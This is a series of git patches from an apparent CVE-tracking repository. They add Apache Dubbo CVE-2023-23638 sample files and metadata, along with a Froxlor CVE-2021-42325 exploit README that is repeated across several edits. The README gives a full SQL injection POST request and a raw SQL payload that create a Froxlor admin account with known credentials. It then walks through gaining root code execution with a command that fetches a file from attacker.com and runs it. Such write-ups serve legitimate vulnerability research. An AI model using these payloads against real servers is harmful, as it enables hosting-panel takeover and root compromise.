System.out.println("dubbo service started"); + new CountDownLatch(1).await(); + } + +} diff --git a/cve/apache-Dubbo/2023/CVE-2023-23638/pom.xml b/cve/apache-Dubbo/2023/CVE-2023-23638/pom.xml new file mode 100644 index 00000000..63f4db38 --- /dev/null +++ b/cve/apache-Dubbo/2023/CVE-2023-23638/pom.xml @@ -0,0 +1,121 @@ + + + + + 4.0.0 + + dubbo-samples-test + org.apache.dubbo.samples + 1.0-SNAPSHOT + + + 1.8 + 1.8 + 3.1.5 + + + 4.3.3.RELEASE + 4.13.1 + 3.7.0 + + + + + + org.springframework + spring-framework-bom + ${spring.version} + pom + import + + + org.apache.dubbo + dubbo-bom + ${dubbo.version} + pom + import + + + org.apache.dubbo + dubbo-dependencies-zookeeper + ${dubbo.version} + pom + + + junit + junit + ${junit.version} + test + + + + org.springframework + spring-test + test + + + + + + + org.apache.dubbo + dubbo + + + + org.apache.dubbo + dubbo-dependencies-zookeeper + pom + + + + + + + org.apache.maven.plugins + maven-compiler-plugin + ${maven-compiler-plugin.version} + + ${source.level} + ${target.level} + + + + org.springframework.boot + spring-boot-maven-plugin + + + + repackage + + + spring-boot + + org.apache.dubbo.samples.DemoConsumer + + + + + + + + diff --git a/cve/apache-Dubbo/2023/yaml/CVE-2023-23638.yaml b/cve/apache-Dubbo/2023/yaml/CVE-2023-23638.yaml new file mode 100644 index 00000000..01126780 --- /dev/null +++ b/cve/apache-Dubbo/2023/yaml/CVE-2023-23638.yaml @@ -0,0 +1,22 @@ +id: CVE-2023-23638 +source: https://github.com/X1r0z/CVE-2023-23638 +info: + name: Apache Dubbo是一款 RPC 服务开发框架,用于解决微服务架构下的服务治理与通信问题 + severity: CRITICAL + description: | + Dubbo是一个高性能优秀的服务框架。CVE-2023-23638中,Dubbo泛型调用存在反序列化漏洞,可导致恶意代码执行。 + scope-of-influence: + Dubbo 2.7.0 - 2.7.21 + Dubbo 3.0.0 - 3.0.13 + Dubbo 3.1.0 - 3.1.5 + reference: + - https://exp10it.cn/2023/03/apache-dubbo-cve-2023-23638-%E5%88%86%E6%9E%90/ + - https://mp.weixin.qq.com/s?__biz=Mzg3OTcyNjM1MQ==&mid=2247483788&idx=1&sn=7954ad20fec203469a13a09050536a1c + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-23638 + cwe-id: CWE-502 + cnvd-id: None + kve-id: None + tags: Apache Dubbo, Deserialization vulnerability when generic invoke diff --git a/openkylin_list.yaml b/openkylin_list.yaml index ce103e6a..3051c951 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -11,6 +11,7 @@ cve: - CVE-2020-13932 apache-CouchDB: - CVE-2022-24706 + - CVE-2023-23638 apache-Dubbo: - CVE-2021-43297 - CVE-2021-25641 From 8a36e199937946dcd2f0ca5a60827ea2962bdabb Mon Sep 17 00:00:00 2001 From: wangyue Date: Thu, 6 Apr 2023 02:33:44 +0000 Subject: [PATCH 035/109] add cve/Froxlor/2023. Signed-off-by: wangyue --- cve/Froxlor/2023/CVE-2021-42325 | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/Froxlor/2023/CVE-2021-42325 diff --git a/cve/Froxlor/2023/CVE-2021-42325 b/cve/Froxlor/2023/CVE-2021-42325 new file mode 100644 index 00000000..e69de29b From de4d411831e736a9b8107f6bcf4d39c7514b94bf Mon Sep 17 00:00:00 2001 From: wangyue Date: Thu, 6 Apr 2023 02:34:49 +0000 Subject: [PATCH 036/109] rename cve/Froxlor/2023/CVE-2021-42325 to cve/Froxlor/2023/CVE-2021-42325/. Signed-off-by: wangyue --- cve/Froxlor/2023/{CVE-2021-42325 => CVE-2021-42325/README.md} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename cve/Froxlor/2023/{CVE-2021-42325 => CVE-2021-42325/README.md} (100%) diff --git a/cve/Froxlor/2023/CVE-2021-42325 b/cve/Froxlor/2023/CVE-2021-42325/README.md similarity index 100% rename from cve/Froxlor/2023/CVE-2021-42325 rename to cve/Froxlor/2023/CVE-2021-42325/README.md From bef4525b9c28437595efb8b48a7fc6ea6e4a8d2b Mon Sep 17 00:00:00 2001 From: wangyue Date: Thu, 6 Apr 2023 02:35:37 +0000 Subject: [PATCH 037/109] update cve/Froxlor/2023/CVE-2021-42325/README.md. Signed-off-by: wangyue --- cve/Froxlor/2023/CVE-2021-42325/README.md | 91 +++++++++++++++++++++++ 1 file changed, 91 insertions(+) diff --git a/cve/Froxlor/2023/CVE-2021-42325/README.md b/cve/Froxlor/2023/CVE-2021-42325/README.md index e69de29b..4fd9416a 100644 --- a/cve/Froxlor/2023/CVE-2021-42325/README.md +++ b/cve/Froxlor/2023/CVE-2021-42325/README.md @@ -0,0 +1,91 @@ +# Exploit Title: Froxlor 0.10.29.1 - SQL Injection (Authenticated) +# Exploit Author: Martin Cernac +# Date: 2021-11-05 +# Vendor: Froxlor (https://froxlor.org/) +# Software Link: https://froxlor.org/download.php +# Affected Version: 0.10.28, 0.10.29, 0.10.29.1 +# Patched Version: 0.10.30 +# Category: Web Application +# Tested on: Ubuntu +# CVE: 2021-42325 + +# 1. Technical Description: +# +# Froxlor 0.10.28 and 0.10.29.x are affected by an SQL Injection from the authenticated customer panel. This allows an attacker to escalate privilege by creating a Froxlor administrator account and use it to get Remote Code Execution as root on the target machine. +# +# 1.1 Pre-requisites +# - Access to a customer account +# - Ability to specify database name when creating a database +# - Feature only availible from 0.10.28 onward and must be manually enabled + + +# 2. Proof Of Concept (PoC): +# +# The following is a walkthrough of privilege escalation from a mere customer to an admin and achieving RCE as root +# +# 2.1 Privilege Escalation +# +# - Sign into Froxlor as a customer +# - View your databases +# - Create a database +# - Put your payload into the "User/Database name" field (if enabled) +# - Application will error out however your SQL query will be executed +# +# The following is a POST request example of running the payload provided, resulting in an administrator account being created +--- +POST /froxlor/customer_mysql.php?s=fdbdf63173d0b332ce13a148476499b2 HTTP/1.1 +Host: localhost +Content-Type: application/x-www-form-urlencoded +Content-Length: 448 + +s=fdbdf63173d0b332ce13a148476499b2&page=mysqls&action=add&send=send&custom_suffix=%60%3Binsert+into+panel_admins+%28loginname%2Cpassword%2Ccustomers_see_all%2Cdomains_see_all%2Ccaneditphpsettings%2Cchange_serversettings%29+values+%28%27x%27%2C%27%245%24ccd0bcdd9ab970b1%24Hx%2Fa0W8QHwTisNoa1lYCY4s3goJeh.YCQ3hWqH1ZUr8%27%2C1%2C1%2C1%2C1%29%3B--&description=x&mysql_password=asdasdasdasdasdasdwire&mysql_password_suggestion=oyxtjaihgb&sendinfomail=0 +--- +# +# 2.2 Remote Code Execution +# +# To achieve RCE as root: +# +# - Sign into Froxlor as the newly created admin account (payload example creds are x:a) +# - Go to System Settings +# - Go to Webserver settings +# - Adjust "Webserver reload command" field to a custom command +# - The command must not contain any of the following special characters: ;|&><`$~? +# - For details, see "safe_exec" function in lib/Froxlor/FileDir.php +# - For example commands see Payloads 4.2 section +# - Trigger configuration file rebuild +# - Use menu item "Rebuild config files" +# - Await a root cron job to execute your command + + +# 3. Vulnerable resources and parameters +# /customer_mysql.php (POST field: custom_suffix) + + +# 4. Payloads +# +# 4.1 SQL Injection payload +# The following payload creates a new Froxlor admin with full access to all customers and the server configuration +# The credentials are: +# - username: x +# - password: a +# +# `;insert into panel_admins (loginname,password,customers_see_all,domains_see_all,caneditphpsettings,change_serversettings) values ('x','$5$ccd0bcdd9ab970b1$Hx/a0W8QHwTisNoa1lYCY4s3goJeh.YCQ3hWqH1ZUr8',1,1,1,1);-- +# +# +# 4.2 Remote Code Execution payload +# Two part payload: +# - wget http://attacker.com/malicious.txt -O /runme.php +# - php /runme.php + + +# 5. Timeline +# 2021-10-11 Discovery +# 2021-10-11 Contact with developer +# 2021-10-11 Patch issued but no release rolled out +# 2021-10-12 Reserved CVE-2021-42325 +# 2021-11-05 Fix release rolled out +# 2021-11-07 Public disclosure + + +# 6. References: +# https://github.com/Froxlor/Froxlor/releases/tag/0.10.30 \ No newline at end of file From a564daccde1ca2ad8ba2f900da3ced56886381d8 Mon Sep 17 00:00:00 2001 From: wangyue Date: Thu, 6 Apr 2023 02:38:34 +0000 Subject: [PATCH 038/109] update cve/Froxlor/2023/CVE-2021-42325/README.md. Signed-off-by: wangyue --- cve/Froxlor/2023/CVE-2021-42325/README.md | 25 +++++++++-------------- 1 file changed, 10 insertions(+), 15 deletions(-) diff --git a/cve/Froxlor/2023/CVE-2021-42325/README.md b/cve/Froxlor/2023/CVE-2021-42325/README.md index 4fd9416a..c9cd9d3f 100644 --- a/cve/Froxlor/2023/CVE-2021-42325/README.md +++ b/cve/Froxlor/2023/CVE-2021-42325/README.md @@ -9,17 +9,15 @@ # Tested on: Ubuntu # CVE: 2021-42325 -# 1. Technical Description: -# -# Froxlor 0.10.28 and 0.10.29.x are affected by an SQL Injection from the authenticated customer panel. This allows an attacker to escalate privilege by creating a Froxlor administrator account and use it to get Remote Code Execution as root on the target machine. +### 1. Technical Description: +Froxlor 0.10.28 and 0.10.29.x are affected by an SQL Injection from the authenticated customer panel. This allows an attacker to escalate privilege by creating a Froxlor administrator account and use it to get Remote Code Execution as root on the target machine. # # 1.1 Pre-requisites # - Access to a customer account # - Ability to specify database name when creating a database # - Feature only availible from 0.10.28 onward and must be manually enabled - - -# 2. Proof Of Concept (PoC): + +### 2. Proof Of Concept (PoC): # # The following is a walkthrough of privilege escalation from a mere customer to an admin and achieving RCE as root # @@ -56,12 +54,11 @@ s=fdbdf63173d0b332ce13a148476499b2&page=mysqls&action=add&send=send&custom_suffi # - Use menu item "Rebuild config files" # - Await a root cron job to execute your command - -# 3. Vulnerable resources and parameters +### 3. Vulnerable resources and parameters # /customer_mysql.php (POST field: custom_suffix) -# 4. Payloads +### 4. Payloads # # 4.1 SQL Injection payload # The following payload creates a new Froxlor admin with full access to all customers and the server configuration @@ -76,16 +73,14 @@ s=fdbdf63173d0b332ce13a148476499b2&page=mysqls&action=add&send=send&custom_suffi # Two part payload: # - wget http://attacker.com/malicious.txt -O /runme.php # - php /runme.php - - -# 5. Timeline + +### 5. Timeline # 2021-10-11 Discovery # 2021-10-11 Contact with developer # 2021-10-11 Patch issued but no release rolled out # 2021-10-12 Reserved CVE-2021-42325 # 2021-11-05 Fix release rolled out # 2021-11-07 Public disclosure - - -# 6. References: + +### 6. References: # https://github.com/Froxlor/Froxlor/releases/tag/0.10.30 \ No newline at end of file From 3c6c0ebf78fa1cdff1b04b26763be6a3f4473311 Mon Sep 17 00:00:00 2001 From: wangyue Date: Thu, 6 Apr 2023 02:40:39 +0000 Subject: [PATCH 039/109] update cve/Froxlor/2023/CVE-2021-42325/README.md. Signed-off-by: wangyue --- cve/Froxlor/2023/CVE-2021-42325/README.md | 126 +++++++++++----------- 1 file changed, 63 insertions(+), 63 deletions(-) diff --git a/cve/Froxlor/2023/CVE-2021-42325/README.md b/cve/Froxlor/2023/CVE-2021-42325/README.md index c9cd9d3f..1a371371 100644 --- a/cve/Froxlor/2023/CVE-2021-42325/README.md +++ b/cve/Froxlor/2023/CVE-2021-42325/README.md @@ -1,35 +1,35 @@ -# Exploit Title: Froxlor 0.10.29.1 - SQL Injection (Authenticated) -# Exploit Author: Martin Cernac -# Date: 2021-11-05 -# Vendor: Froxlor (https://froxlor.org/) -# Software Link: https://froxlor.org/download.php -# Affected Version: 0.10.28, 0.10.29, 0.10.29.1 -# Patched Version: 0.10.30 -# Category: Web Application -# Tested on: Ubuntu -# CVE: 2021-42325 + Exploit Title: Froxlor 0.10.29.1 - SQL Injection (Authenticated) + Exploit Author: Martin Cernac + Date: 2021-11-05 + Vendor: Froxlor (https://froxlor.org/) + Software Link: https://froxlor.org/download.php + Affected Version: 0.10.28, 0.10.29, 0.10.29.1 + Patched Version: 0.10.30 + Category: Web Application + Tested on: Ubuntu + CVE: 2021-42325 ### 1. Technical Description: Froxlor 0.10.28 and 0.10.29.x are affected by an SQL Injection from the authenticated customer panel. This allows an attacker to escalate privilege by creating a Froxlor administrator account and use it to get Remote Code Execution as root on the target machine. -# -# 1.1 Pre-requisites -# - Access to a customer account -# - Ability to specify database name when creating a database -# - Feature only availible from 0.10.28 onward and must be manually enabled + +#### 1.1 Pre-requisites + - Access to a customer account + - Ability to specify database name when creating a database + - Feature only availible from 0.10.28 onward and must be manually enabled ### 2. Proof Of Concept (PoC): + +The following is a walkthrough of privilege escalation from a mere customer to an admin and achieving RCE as root # -# The following is a walkthrough of privilege escalation from a mere customer to an admin and achieving RCE as root -# -# 2.1 Privilege Escalation -# -# - Sign into Froxlor as a customer -# - View your databases -# - Create a database -# - Put your payload into the "User/Database name" field (if enabled) -# - Application will error out however your SQL query will be executed -# -# The following is a POST request example of running the payload provided, resulting in an administrator account being created +#### 2.1 Privilege Escalation + + - Sign into Froxlor as a customer + - View your databases + - Create a database + - Put your payload into the "User/Database name" field (if enabled) + - Application will error out however your SQL query will be executed + + The following is a POST request example of running the payload provided, resulting in an administrator account being created --- POST /froxlor/customer_mysql.php?s=fdbdf63173d0b332ce13a148476499b2 HTTP/1.1 Host: localhost @@ -38,49 +38,49 @@ Content-Length: 448 s=fdbdf63173d0b332ce13a148476499b2&page=mysqls&action=add&send=send&custom_suffix=%60%3Binsert+into+panel_admins+%28loginname%2Cpassword%2Ccustomers_see_all%2Cdomains_see_all%2Ccaneditphpsettings%2Cchange_serversettings%29+values+%28%27x%27%2C%27%245%24ccd0bcdd9ab970b1%24Hx%2Fa0W8QHwTisNoa1lYCY4s3goJeh.YCQ3hWqH1ZUr8%27%2C1%2C1%2C1%2C1%29%3B--&description=x&mysql_password=asdasdasdasdasdasdwire&mysql_password_suggestion=oyxtjaihgb&sendinfomail=0 --- -# -# 2.2 Remote Code Execution -# -# To achieve RCE as root: -# -# - Sign into Froxlor as the newly created admin account (payload example creds are x:a) -# - Go to System Settings -# - Go to Webserver settings -# - Adjust "Webserver reload command" field to a custom command -# - The command must not contain any of the following special characters: ;|&><`$~? -# - For details, see "safe_exec" function in lib/Froxlor/FileDir.php -# - For example commands see Payloads 4.2 section -# - Trigger configuration file rebuild -# - Use menu item "Rebuild config files" -# - Await a root cron job to execute your command + +#### 2.2 Remote Code Execution + + To achieve RCE as root: + + - Sign into Froxlor as the newly created admin account (payload example creds are x:a) + - Go to System Settings + - Go to Webserver settings + - Adjust "Webserver reload command" field to a custom command + - The command must not contain any of the following special characters: ;|&><`$~? + - For details, see "safe_exec" function in lib/Froxlor/FileDir.php + - For example commands see Payloads 4.2 section + - Trigger configuration file rebuild + - Use menu item "Rebuild config files" + - Await a root cron job to execute your command ### 3. Vulnerable resources and parameters -# /customer_mysql.php (POST field: custom_suffix) + /customer_mysql.php (POST field: custom_suffix) ### 4. Payloads -# -# 4.1 SQL Injection payload -# The following payload creates a new Froxlor admin with full access to all customers and the server configuration -# The credentials are: -# - username: x -# - password: a -# -# `;insert into panel_admins (loginname,password,customers_see_all,domains_see_all,caneditphpsettings,change_serversettings) values ('x','$5$ccd0bcdd9ab970b1$Hx/a0W8QHwTisNoa1lYCY4s3goJeh.YCQ3hWqH1ZUr8',1,1,1,1);-- -# -# -# 4.2 Remote Code Execution payload -# Two part payload: -# - wget http://attacker.com/malicious.txt -O /runme.php -# - php /runme.php + +#### 4.1 SQL Injection payload + The following payload creates a new Froxlor admin with full access to all customers and the server configuration + The credentials are: + - username: x + - password: a + + `;insert into panel_admins (loginname,password,customers_see_all,domains_see_all,caneditphpsettings,change_serversettings) values ('x','$5$ccd0bcdd9ab970b1$Hx/a0W8QHwTisNoa1lYCY4s3goJeh.YCQ3hWqH1ZUr8',1,1,1,1);-- + + +#### 4.2 Remote Code Execution payload + Two part payload: + - wget http://attacker.com/malicious.txt -O /runme.php + - php /runme.php ### 5. Timeline -# 2021-10-11 Discovery -# 2021-10-11 Contact with developer -# 2021-10-11 Patch issued but no release rolled out -# 2021-10-12 Reserved CVE-2021-42325 -# 2021-11-05 Fix release rolled out -# 2021-11-07 Public disclosure + 2021-10-11 Discovery + 2021-10-11 Contact with developer + 2021-10-11 Patch issued but no release rolled out + 2021-10-12 Reserved CVE-2021-42325 + 2021-11-05 Fix release rolled out + 2021-11-07 Public disclosure ### 6. References: -# https://github.com/Froxlor/Froxlor/releases/tag/0.10.30 \ No newline at end of file + https://github.com/Froxlor/Froxlor/releases/tag/0.10.30 \ No newline at end of file From ad9ca0a74775377025df771b6d7f76c5b9b0b776 Mon Sep 17 00:00:00 2001 From: wangyue Date: Thu, 6 Apr 2023 02:42:39 +0000 Subject: [PATCH 040/109] update cve/Froxlor/2023/CVE-2021-42325/README.md. Signed-off-by: wangyue --- cve/Froxlor/2023/CVE-2021-42325/README.md | 31 +++++++++++++---------- 1 file changed, 17 insertions(+), 14 deletions(-) diff --git a/cve/Froxlor/2023/CVE-2021-42325/README.md b/cve/Froxlor/2023/CVE-2021-42325/README.md index 1a371371..c1b38e2e 100644 --- a/cve/Froxlor/2023/CVE-2021-42325/README.md +++ b/cve/Froxlor/2023/CVE-2021-42325/README.md @@ -1,13 +1,14 @@ - Exploit Title: Froxlor 0.10.29.1 - SQL Injection (Authenticated) - Exploit Author: Martin Cernac - Date: 2021-11-05 - Vendor: Froxlor (https://froxlor.org/) - Software Link: https://froxlor.org/download.php - Affected Version: 0.10.28, 0.10.29, 0.10.29.1 - Patched Version: 0.10.30 - Category: Web Application - Tested on: Ubuntu - CVE: 2021-42325 +- Exploit Title: Froxlor 0.10.29.1 - SQL Injection (Authenticated) +- Exploit Author: Martin Cernac +- Date: 2021-11-05 +- Vendor: Froxlor (https://froxlor.org/) +- Software Link: https://froxlor.org/download.php +- Affected Version: 0.10.28, 0.10.29, 0.10.29.1 +- Patched Version: 0.10.30 +- Category: Web Application +- Tested on: Ubuntu +- CVE: 2021-42325 + ### 1. Technical Description: Froxlor 0.10.28 and 0.10.29.x are affected by an SQL Injection from the authenticated customer panel. This allows an attacker to escalate privilege by creating a Froxlor administrator account and use it to get Remote Code Execution as root on the target machine. @@ -28,16 +29,18 @@ The following is a walkthrough of privilege escalation from a mere customer to a - Create a database - Put your payload into the "User/Database name" field (if enabled) - Application will error out however your SQL query will be executed - The following is a POST request example of running the payload provided, resulting in an administrator account being created ---- + + +``` POST /froxlor/customer_mysql.php?s=fdbdf63173d0b332ce13a148476499b2 HTTP/1.1 Host: localhost Content-Type: application/x-www-form-urlencoded Content-Length: 448 - s=fdbdf63173d0b332ce13a148476499b2&page=mysqls&action=add&send=send&custom_suffix=%60%3Binsert+into+panel_admins+%28loginname%2Cpassword%2Ccustomers_see_all%2Cdomains_see_all%2Ccaneditphpsettings%2Cchange_serversettings%29+values+%28%27x%27%2C%27%245%24ccd0bcdd9ab970b1%24Hx%2Fa0W8QHwTisNoa1lYCY4s3goJeh.YCQ3hWqH1ZUr8%27%2C1%2C1%2C1%2C1%29%3B--&description=x&mysql_password=asdasdasdasdasdasdwire&mysql_password_suggestion=oyxtjaihgb&sendinfomail=0 ---- + +``` + #### 2.2 Remote Code Execution From cf726d4abc1c08220b40ef7c00115a4f53d6cef3 Mon Sep 17 00:00:00 2001 From: wangyue Date: Thu, 6 Apr 2023 02:44:07 +0000 Subject: [PATCH 041/109] add cve/Froxlor/2023/yaml. Signed-off-by: wangyue --- cve/Froxlor/2023/yaml/CVE-2021-42325.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/Froxlor/2023/yaml/CVE-2021-42325.yaml diff --git a/cve/Froxlor/2023/yaml/CVE-2021-42325.yaml b/cve/Froxlor/2023/yaml/CVE-2021-42325.yaml new file mode 100644 index 00000000..e69de29b From dd4424ffa73898c4b74ac460639890a3bcc7a1c1 Mon Sep 17 00:00:00 2001 From: wangyue Date: Thu, 6 Apr 2023 02:50:02 +0000 Subject: [PATCH 042/109] update cve/Froxlor/2023/yaml/CVE-2021-42325.yaml. Signed-off-by: wangyue --- cve/Froxlor/2023/yaml/CVE-2021-42325.yaml | 24 +++++++++++++++++++++++ 1 file changed, 24 insertions(+) diff --git a/cve/Froxlor/2023/yaml/CVE-2021-42325.yaml b/cve/Froxlor/2023/yaml/CVE-2021-42325.yaml index e69de29b..85ee9e0e 100644 --- a/cve/Froxlor/2023/yaml/CVE-2021-42325.yaml +++ b/cve/Froxlor/2023/yaml/CVE-2021-42325.yaml @@ -0,0 +1,24 @@ +id: CVE-2021-42325 +source: + https://github.com/Froxlor/Froxlor/commit/eb592340b022298f62a0a3e8450dbfbe29585782 +info: + name: Froxlor是一款易于使用且功能强大的服务器管理面板,用于管理各种主机和域名服务。 + severity: high + description: | + Froxlor是Froxlor团队的一套轻量级服务器管理软件。 + Froxlor存在安全漏洞,该漏洞允许在数据库管理器DbManagerMySQL.php中通过自定义数据库名称注入SQL。 + scope-of-influence: + Froxlor 0.10.2l9.1 + reference: + - http://packetstormsecurity.com/files/164800/Froxlor-0.10.29.1-SQL-Injection.html + - https://github.com/Froxlor/Froxlor/commit/eb592340b022298f62a0a3e8450dbfbe29585782 + - https://www.exploit-db.com/exploits/50502 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2021-42325 + edb-id: 50502 + cwe-id: None + cnvd-id: None + kve-id: None + tags: exploit, remote, code execution, sql injection \ No newline at end of file From 914a8bc607f692e206ac7866888ef706052b6acf Mon Sep 17 00:00:00 2001 From: wangyue Date: Thu, 6 Apr 2023 02:59:49 +0000 Subject: [PATCH 043/109] update openkylin_list.yaml. Signed-off-by: wangyue --- openkylin_list.yaml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/openkylin_list.yaml b/openkylin_list.yaml index 3051c951..f6e78d03 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -42,6 +42,9 @@ cve: - CVE-2019-0230 Influx-DB: - CVE-2019-20933 + Froxlor: + - CVE-2023-0315 + - CVE-2021-42325 linux-kernel: - CVE-2021-4204 - CVE-2021-29155 From 61d28594e9d38f0179519398279cb48c8272aad6 Mon Sep 17 00:00:00 2001 From: wangyue Date: Sun, 9 Apr 2023 03:47:33 +0000 Subject: [PATCH 044/109] update cve/Froxlor/2023/yaml/CVE-2021-42325.yaml. Signed-off-by: wangyue --- cve/Froxlor/2023/yaml/CVE-2021-42325.yaml | 10 ++++++---- 1 file changed, 6 insertions(+), 4 deletions(-) diff --git a/cve/Froxlor/2023/yaml/CVE-2021-42325.yaml b/cve/Froxlor/2023/yaml/CVE-2021-42325.yaml index 85ee9e0e..c266bcd9 100644 --- a/cve/Froxlor/2023/yaml/CVE-2021-42325.yaml +++ b/cve/Froxlor/2023/yaml/CVE-2021-42325.yaml @@ -3,22 +3,24 @@ source: https://github.com/Froxlor/Froxlor/commit/eb592340b022298f62a0a3e8450dbfbe29585782 info: name: Froxlor是一款易于使用且功能强大的服务器管理面板,用于管理各种主机和域名服务。 - severity: high + severity: 高危 description: | Froxlor是Froxlor团队的一套轻量级服务器管理软件。 Froxlor存在安全漏洞,该漏洞允许在数据库管理器DbManagerMySQL.php中通过自定义数据库名称注入SQL。 scope-of-influence: Froxlor 0.10.2l9.1 reference: + - https://nvd.nist.gov/vuln/detail/CVE-2021-42325 + - https://avd.aliyun.com/detail?id=AVD-2021-42325 - http://packetstormsecurity.com/files/164800/Froxlor-0.10.29.1-SQL-Injection.html - https://github.com/Froxlor/Froxlor/commit/eb592340b022298f62a0a3e8450dbfbe29585782 - https://www.exploit-db.com/exploits/50502 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.8 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 cve-id: CVE-2021-42325 edb-id: 50502 - cwe-id: None + cwe-id: CWE-89 cnvd-id: None kve-id: None tags: exploit, remote, code execution, sql injection \ No newline at end of file From 7d12eb33e0178fe0fe9b369e24f7a8c2d87452f5 Mon Sep 17 00:00:00 2001 From: wangyue Date: Sun, 9 Apr 2023 03:54:41 +0000 Subject: [PATCH 045/109] update cve/Froxlor/2023/yaml/CVE-2021-42325.yaml. Signed-off-by: wangyue --- cve/Froxlor/2023/yaml/CVE-2021-42325.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/cve/Froxlor/2023/yaml/CVE-2021-42325.yaml b/cve/Froxlor/2023/yaml/CVE-2021-42325.yaml index c266bcd9..f7274053 100644 --- a/cve/Froxlor/2023/yaml/CVE-2021-42325.yaml +++ b/cve/Froxlor/2023/yaml/CVE-2021-42325.yaml @@ -8,7 +8,7 @@ info: Froxlor是Froxlor团队的一套轻量级服务器管理软件。 Froxlor存在安全漏洞,该漏洞允许在数据库管理器DbManagerMySQL.php中通过自定义数据库名称注入SQL。 scope-of-influence: - Froxlor 0.10.2l9.1 + Froxlor 0.9~0.10.30 reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-42325 - https://avd.aliyun.com/detail?id=AVD-2021-42325 @@ -19,7 +19,6 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-42325 - edb-id: 50502 cwe-id: CWE-89 cnvd-id: None kve-id: None From c15f7e209a026d958e6eb7344ece71e9e8631fdf Mon Sep 17 00:00:00 2001 From: wangyue Date: Sun, 9 Apr 2023 04:00:43 +0000 Subject: [PATCH 046/109] =?UTF-8?q?update=20openkylin=5Flist.yaml.=20=20Fr?= =?UTF-8?q?oxlor=E5=B7=B2=E5=90=88=E5=B9=B6?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: wangyue --- openkylin_list.yaml | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/openkylin_list.yaml b/openkylin_list.yaml index f6e78d03..52d07ef1 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -42,9 +42,6 @@ cve: - CVE-2019-0230 Influx-DB: - CVE-2019-20933 - Froxlor: - - CVE-2023-0315 - - CVE-2021-42325 linux-kernel: - CVE-2021-4204 - CVE-2021-29155 @@ -169,6 +166,7 @@ cve: Grafana: - CVE-2021-43798 Froxlor: + - CVE-2021-42325 - CVE-2023-0315 cnvd: apache-tomcat: From 3c5693cd85a9a6234f4e497478961f6af435fad5 Mon Sep 17 00:00:00 2001 From: wangyue Date: Mon, 10 Apr 2023 01:48:19 +0000 Subject: [PATCH 047/109] =?UTF-8?q?=E6=96=B0=E5=BB=BA=202023?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Froxlor/2023/2023/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/Froxlor/2023/2023/.keep diff --git a/cve/Froxlor/2023/2023/.keep b/cve/Froxlor/2023/2023/.keep new file mode 100644 index 00000000..e69de29b From 56c2d8e62ee325d85de8b2f8913d8a0a6729c377 Mon Sep 17 00:00:00 2001 From: wangyue Date: Mon, 10 Apr 2023 01:48:27 +0000 Subject: [PATCH 048/109] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20?= =?UTF-8?q?cve/Froxlor/2023/2023/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Froxlor/2023/2023/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/Froxlor/2023/2023/.keep diff --git a/cve/Froxlor/2023/2023/.keep b/cve/Froxlor/2023/2023/.keep deleted file mode 100644 index e69de29b..00000000 From 665b3fba6d757bbf8d92366a6616e50f86fb9595 Mon Sep 17 00:00:00 2001 From: wangyue Date: Mon, 10 Apr 2023 01:49:11 +0000 Subject: [PATCH 049/109] =?UTF-8?q?=E6=96=B0=E5=BB=BA=202021?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Froxlor/2021/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/Froxlor/2021/.keep diff --git a/cve/Froxlor/2021/.keep b/cve/Froxlor/2021/.keep new file mode 100644 index 00000000..e69de29b From 738f14b0d6affc02132addd5e9de19e765145a53 Mon Sep 17 00:00:00 2001 From: wangyue Date: Mon, 10 Apr 2023 01:50:27 +0000 Subject: [PATCH 050/109] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE-2021-42325?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Froxlor/2021/CVE-2021-42325/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/Froxlor/2021/CVE-2021-42325/.keep diff --git a/cve/Froxlor/2021/CVE-2021-42325/.keep b/cve/Froxlor/2021/CVE-2021-42325/.keep new file mode 100644 index 00000000..e69de29b From 8a02e73a035dcd14a81b711f9bd2eff197c29895 Mon Sep 17 00:00:00 2001 From: wangyue Date: Mon, 10 Apr 2023 01:50:34 +0000 Subject: [PATCH 051/109] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20?= =?UTF-8?q?cve/Froxlor/2021/CVE-2021-42325/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Froxlor/2021/CVE-2021-42325/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/Froxlor/2021/CVE-2021-42325/.keep diff --git a/cve/Froxlor/2021/CVE-2021-42325/.keep 